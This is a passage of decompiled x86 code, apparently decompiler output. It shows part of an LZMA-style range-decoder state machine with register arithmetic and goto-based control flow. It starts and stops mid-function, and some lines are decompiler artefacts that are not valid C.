                                                                                                                          													goto L41;
                                                                                                                          												}
                                                                                                                          											case 7:
                                                                                                                          												__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                          												if( *(__ebp - 0x40) != 1) {
                                                                                                                          													__eax =  *(__ebp - 0x24);
                                                                                                                          													 *(__ebp - 0x80) = 0x16;
                                                                                                                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          													__eax =  *(__ebp - 0x28);
                                                                                                                          													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          													__eax =  *(__ebp - 0x2c);
                                                                                                                          													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          													__eax = 0;
                                                                                                                          													__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          													__al = __al & 0x000000fd;
                                                                                                                          													__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          													__eax =  *(__ebp - 4);
                                                                                                                          													__eax =  *(__ebp - 4) + 0x664;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													 *(__ebp - 0x58) = __eax;
                                                                                                                          													goto L69;
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x84) = 8;
                                                                                                                          												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                          												while(1) {
                                                                                                                          													L132:
                                                                                                                          													 *(_t613 - 0x54) = _t606;
                                                                                                                          													goto L133;
                                                                                                                          												}
                                                                                                                          											case 8:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													__eax =  *(__ebp - 4);
                                                                                                                          													__ecx =  *(__ebp - 0x38);
                                                                                                                          													 *(__ebp - 0x84) = 0xa;
                                                                                                                          													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                          												} else {
                                                                                                                          													__eax =  *(__ebp - 0x38);
                                                                                                                          													__ecx =  *(__ebp - 4);
                                                                                                                          													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                          													 *(__ebp - 0x84) = 9;
                                                                                                                          													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                          													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                          												}
                                                                                                                          												while(1) {
                                                                                                                          													L132:
                                                                                                                          													 *(_t613 - 0x54) = _t606;
                                                                                                                          													goto L133;
                                                                                                                          												}
                                                                                                                          											case 9:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													goto L89;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x60);
                                                                                                                          												if( *(__ebp - 0x60) == 0) {
                                                                                                                          													goto L171;
                                                                                                                          												}
                                                                                                                          												__eax = 0;
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                          												__eflags = _t259;
                                                                                                                          												0 | _t259 = _t259 + _t259 + 9;
                                                                                                                          												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                          												goto L76;
                                                                                                                          											case 0xa:
                                                                                                                          												goto L0;
                                                                                                                          											case 0xb:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													__ecx =  *(__ebp - 0x24);
                                                                                                                          													__eax =  *(__ebp - 0x20);
                                                                                                                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          												} else {
                                                                                                                          													__eax =  *(__ebp - 0x24);
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x28);
                                                                                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          												goto L88;
                                                                                                                          											case 0xc:
                                                                                                                          												L99:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0xc;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t334 = __ebp - 0x70;
                                                                                                                          												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t334;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												__eax =  *(__ebp - 0x2c);
                                                                                                                          												goto L101;
                                                                                                                          											case 0xd:
                                                                                                                          												L37:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0xd;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t122 = __ebp - 0x70;
                                                                                                                          												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t122;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												L39:
                                                                                                                          												__eax =  *(__ebp - 0x40);
                                                                                                                          												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                          													goto L48;
                                                                                                                          												}
                                                                                                                          												__eflags = __ebx - 0x100;
                                                                                                                          												if(__ebx >= 0x100) {
                                                                                                                          													goto L54;
                                                                                                                          												}
                                                                                                                          												L41:
                                                                                                                          												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                          												__ecx =  *(__ebp - 0x58);
                                                                                                                          												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                          												 *(__ebp - 0x48) = __eax;
                                                                                                                          												__eax = __eax + 1;
                                                                                                                          												__eax = __eax << 8;
                                                                                                                          												__eax = __eax + __ebx;
                                                                                                                          												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          												__ax =  *__esi;
                                                                                                                          												 *(__ebp - 0x54) = __esi;
                                                                                                                          												__edx = __ax & 0x0000ffff;
                                                                                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													__cx = __ax;
                                                                                                                          													 *(__ebp - 0x40) = 1;
                                                                                                                          													__cx = __ax >> 5;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													__ebx = __ebx + __ebx + 1;
                                                                                                                          													 *__esi = __ax;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                          													 *(__ebp - 0x10) = __ecx;
                                                                                                                          													0x800 = 0x800 - __edx;
                                                                                                                          													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                          													__ebx = __ebx + __ebx;
                                                                                                                          													 *__esi = __cx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													goto L39;
                                                                                                                          												} else {
                                                                                                                          													goto L37;
                                                                                                                          												}
                                                                                                                          											case 0xe:
                                                                                                                          												L46:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0xe;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t156 = __ebp - 0x70;
                                                                                                                          												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t156;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												while(1) {
                                                                                                                          													L48:
                                                                                                                          													__eflags = __ebx - 0x100;
                                                                                                                          													if(__ebx >= 0x100) {
                                                                                                                          														break;
                                                                                                                          													}
                                                                                                                          													__eax =  *(__ebp - 0x58);
                                                                                                                          													__edx = __ebx + __ebx;
                                                                                                                          													__ecx =  *(__ebp - 0x10);
                                                                                                                          													__esi = __edx + __eax;
                                                                                                                          													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          													__ax =  *__esi;
                                                                                                                          													 *(__ebp - 0x54) = __esi;
                                                                                                                          													__edi = __ax & 0x0000ffff;
                                                                                                                          													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          														__cx = __ax;
                                                                                                                          														_t170 = __edx + 1; // 0x1
                                                                                                                          														__ebx = _t170;
                                                                                                                          														__cx = __ax >> 5;
                                                                                                                          														__eflags = __eax;
                                                                                                                          														 *__esi = __ax;
                                                                                                                          													} else {
                                                                                                                          														 *(__ebp - 0x10) = __ecx;
                                                                                                                          														0x800 = 0x800 - __edi;
                                                                                                                          														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          														__ebx = __ebx + __ebx;
                                                                                                                          														 *__esi = __cx;
                                                                                                                          													}
                                                                                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          													 *(__ebp - 0x44) = __ebx;
                                                                                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          														continue;
                                                                                                                          													} else {
                                                                                                                          														goto L46;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												L54:
                                                                                                                          												_t173 = __ebp - 0x34;
                                                                                                                          												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                          												__eflags =  *_t173;
                                                                                                                          												goto L55;
                                                                                                                          											case 0xf:
                                                                                                                          												L58:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0xf;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t203 = __ebp - 0x70;
                                                                                                                          												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t203;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												L60:
                                                                                                                          												__eflags = __ebx - 0x100;
                                                                                                                          												if(__ebx >= 0x100) {
                                                                                                                          													L55:
                                                                                                                          													__al =  *(__ebp - 0x44);
                                                                                                                          													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                          													goto L56;
                                                                                                                          												}
                                                                                                                          												L61:
                                                                                                                          												__eax =  *(__ebp - 0x58);
                                                                                                                          												__edx = __ebx + __ebx;
                                                                                                                          												__ecx =  *(__ebp - 0x10);
                                                                                                                          												__esi = __edx + __eax;
                                                                                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          												__ax =  *__esi;
                                                                                                                          												 *(__ebp - 0x54) = __esi;
                                                                                                                          												__edi = __ax & 0x0000ffff;
                                                                                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													__cx = __ax;
                                                                                                                          													_t217 = __edx + 1; // 0x1
                                                                                                                          													__ebx = _t217;
                                                                                                                          													__cx = __ax >> 5;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													 *__esi = __ax;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x10) = __ecx;
                                                                                                                          													0x800 = 0x800 - __edi;
                                                                                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          													__ebx = __ebx + __ebx;
                                                                                                                          													 *__esi = __cx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													goto L60;
                                                                                                                          												} else {
                                                                                                                          													goto L58;
                                                                                                                          												}
                                                                                                                          											case 0x10:
                                                                                                                          												L109:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0x10;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t365 = __ebp - 0x70;
                                                                                                                          												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t365;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												goto L111;
                                                                                                                          											case 0x11:
                                                                                                                          												goto L69;
                                                                                                                          											case 0x12:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													__eax =  *(__ebp - 0x58);
                                                                                                                          													 *(__ebp - 0x84) = 0x13;
                                                                                                                          													__esi =  *(__ebp - 0x58) + 2;
                                                                                                                          													while(1) {
                                                                                                                          														L132:
                                                                                                                          														 *(_t613 - 0x54) = _t606;
                                                                                                                          														goto L133;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x4c);
                                                                                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                          												__ecx =  *(__ebp - 0x58);
                                                                                                                          												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                          												goto L130;
                                                                                                                          											case 0x13:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													_t469 = __ebp - 0x58;
                                                                                                                          													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                          													__eflags =  *_t469;
                                                                                                                          													 *(__ebp - 0x30) = 0x10;
                                                                                                                          													 *(__ebp - 0x40) = 8;
                                                                                                                          													L144:
                                                                                                                          													 *(__ebp - 0x7c) = 0x14;
                                                                                                                          													goto L145;
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x4c);
                                                                                                                          												__ecx =  *(__ebp - 0x58);
                                                                                                                          												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          												 *(__ebp - 0x30) = 8;
                                                                                                                          												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                          												L130:
                                                                                                                          												 *(__ebp - 0x58) = __eax;
                                                                                                                          												 *(__ebp - 0x40) = 3;
                                                                                                                          												goto L144;
                                                                                                                          											case 0x14:
                                                                                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                          												__eax =  *(__ebp - 0x80);
                                                                                                                          												 *(_t613 - 0x88) = _t533;
                                                                                                                          												goto L1;
                                                                                                                          											case 0x15:
                                                                                                                          												__eax = 0;
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          												__al = __al & 0x000000fd;
                                                                                                                          												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          												goto L120;
                                                                                                                          											case 0x16:
                                                                                                                          												__eax =  *(__ebp - 0x30);
                                                                                                                          												__eflags = __eax - 4;
                                                                                                                          												if(__eax >= 4) {
                                                                                                                          													_push(3);
                                                                                                                          													_pop(__eax);
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 4);
                                                                                                                          												 *(__ebp - 0x40) = 6;
                                                                                                                          												__eax = __eax << 7;
                                                                                                                          												 *(__ebp - 0x7c) = 0x19;
                                                                                                                          												 *(__ebp - 0x58) = __eax;
                                                                                                                          												goto L145;
                                                                                                                          											case 0x17:
                                                                                                                          												L145:
                                                                                                                          												__eax =  *(__ebp - 0x40);
                                                                                                                          												 *(__ebp - 0x50) = 1;
                                                                                                                          												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                          												goto L149;
                                                                                                                          											case 0x18:
                                                                                                                          												L146:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0x18;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t484 = __ebp - 0x70;
                                                                                                                          												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t484;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												L148:
                                                                                                                          												_t487 = __ebp - 0x48;
                                                                                                                          												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                          												__eflags =  *_t487;
                                                                                                                          												L149:
                                                                                                                          												__eflags =  *(__ebp - 0x48);
                                                                                                                          												if( *(__ebp - 0x48) <= 0) {
                                                                                                                          													__ecx =  *(__ebp - 0x40);
                                                                                                                          													__ebx =  *(__ebp - 0x50);
                                                                                                                          													0 = 1;
                                                                                                                          													__eax = 1 << __cl;
                                                                                                                          													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                          													__eax =  *(__ebp - 0x7c);
                                                                                                                          													 *(__ebp - 0x44) = __ebx;
                                                                                                                          													while(1) {
                                                                                                                          														 *(_t613 - 0x88) = _t533;
                                                                                                                          														goto L1;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x50);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                          												__eax =  *(__ebp - 0x58);
                                                                                                                          												__esi = __edx + __eax;
                                                                                                                          												 *(__ebp - 0x54) = __esi;
                                                                                                                          												__ax =  *__esi;
                                                                                                                          												__edi = __ax & 0x0000ffff;
                                                                                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													__cx = __ax;
                                                                                                                          													__cx = __ax >> 5;
                                                                                                                          													__eax = __eax - __ecx;
                                                                                                                          													__edx = __edx + 1;
                                                                                                                          													__eflags = __edx;
                                                                                                                          													 *__esi = __ax;
                                                                                                                          													 *(__ebp - 0x50) = __edx;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x10) = __ecx;
                                                                                                                          													0x800 = 0x800 - __edi;
                                                                                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                          													 *__esi = __cx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													goto L148;
                                                                                                                          												} else {
                                                                                                                          													goto L146;
                                                                                                                          												}
                                                                                                                          											case 0x19:
                                                                                                                          												__eflags = __ebx - 4;
                                                                                                                          												if(__ebx < 4) {
                                                                                                                          													 *(__ebp - 0x2c) = __ebx;
                                                                                                                          													L119:
                                                                                                                          													_t393 = __ebp - 0x2c;
                                                                                                                          													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                          													__eflags =  *_t393;
                                                                                                                          													L120:
                                                                                                                          													__eax =  *(__ebp - 0x2c);
                                                                                                                          													__eflags = __eax;
                                                                                                                          													if(__eax == 0) {
                                                                                                                          														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                          														goto L170;
                                                                                                                          													}
                                                                                                                          													__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                          													if(__eax >  *(__ebp - 0x60)) {
                                                                                                                          														goto L171;
                                                                                                                          													}
                                                                                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                          													__eax =  *(__ebp - 0x30);
                                                                                                                          													_t400 = __ebp - 0x60;
                                                                                                                          													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                          													__eflags =  *_t400;
                                                                                                                          													goto L123;
                                                                                                                          												}
                                                                                                                          												__ecx = __ebx;
                                                                                                                          												__eax = __ebx;
                                                                                                                          												__ecx = __ebx >> 1;
                                                                                                                          												__eax = __ebx & 0x00000001;
                                                                                                                          												__ecx = (__ebx >> 1) - 1;
                                                                                                                          												__al = __al | 0x00000002;
                                                                                                                          												__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                          												__eflags = __ebx - 0xe;
                                                                                                                          												 *(__ebp - 0x2c) = __eax;
                                                                                                                          												if(__ebx >= 0xe) {
                                                                                                                          													__ebx = 0;
                                                                                                                          													 *(__ebp - 0x48) = __ecx;
                                                                                                                          													L102:
                                                                                                                          													__eflags =  *(__ebp - 0x48);
                                                                                                                          													if( *(__ebp - 0x48) <= 0) {
                                                                                                                          														__eax = __eax + __ebx;
                                                                                                                          														 *(__ebp - 0x40) = 4;
                                                                                                                          														 *(__ebp - 0x2c) = __eax;
                                                                                                                          														__eax =  *(__ebp - 4);
                                                                                                                          														__eax =  *(__ebp - 4) + 0x644;
                                                                                                                          														__eflags = __eax;
                                                                                                                          														L108:
                                                                                                                          														__ebx = 0;
                                                                                                                          														 *(__ebp - 0x58) = __eax;
                                                                                                                          														 *(__ebp - 0x50) = 1;
                                                                                                                          														 *(__ebp - 0x44) = 0;
                                                                                                                          														 *(__ebp - 0x48) = 0;
                                                                                                                          														L112:
                                                                                                                          														__eax =  *(__ebp - 0x40);
                                                                                                                          														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                          															_t391 = __ebp - 0x2c;
                                                                                                                          															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                          															__eflags =  *_t391;
                                                                                                                          															goto L119;
                                                                                                                          														}
                                                                                                                          														__eax =  *(__ebp - 0x50);
                                                                                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                          														__eax =  *(__ebp - 0x58);
                                                                                                                          														__esi = __edi + __eax;
                                                                                                                          														 *(__ebp - 0x54) = __esi;
                                                                                                                          														__ax =  *__esi;
                                                                                                                          														__ecx = __ax & 0x0000ffff;
                                                                                                                          														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                          														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                          														if( *(__ebp - 0xc) >= __edx) {
                                                                                                                          															__ecx = 0;
                                                                                                                          															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                          															__ecx = 1;
                                                                                                                          															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                          															__ebx = 1;
                                                                                                                          															__ecx =  *(__ebp - 0x48);
                                                                                                                          															__ebx = 1 << __cl;
                                                                                                                          															__ecx = 1 << __cl;
                                                                                                                          															__ebx =  *(__ebp - 0x44);
                                                                                                                          															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                          															__cx = __ax;
                                                                                                                          															__cx = __ax >> 5;
                                                                                                                          															__eax = __eax - __ecx;
                                                                                                                          															__edi = __edi + 1;
                                                                                                                          															__eflags = __edi;
                                                                                                                          															 *(__ebp - 0x44) = __ebx;
                                                                                                                          															 *__esi = __ax;
                                                                                                                          															 *(__ebp - 0x50) = __edi;
                                                                                                                          														} else {
                                                                                                                          															 *(__ebp - 0x10) = __edx;
                                                                                                                          															0x800 = 0x800 - __ecx;
                                                                                                                          															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                          															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                          															 *__esi = __dx;
                                                                                                                          														}
                                                                                                                          														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          															L111:
                                                                                                                          															_t368 = __ebp - 0x48;
                                                                                                                          															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                          															__eflags =  *_t368;
                                                                                                                          															goto L112;
                                                                                                                          														} else {
                                                                                                                          															goto L109;
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          													__ecx =  *(__ebp - 0xc);
                                                                                                                          													__ebx = __ebx + __ebx;
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                          													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                          													 *(__ebp - 0x44) = __ebx;
                                                                                                                          													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                          														__ecx =  *(__ebp - 0x10);
                                                                                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
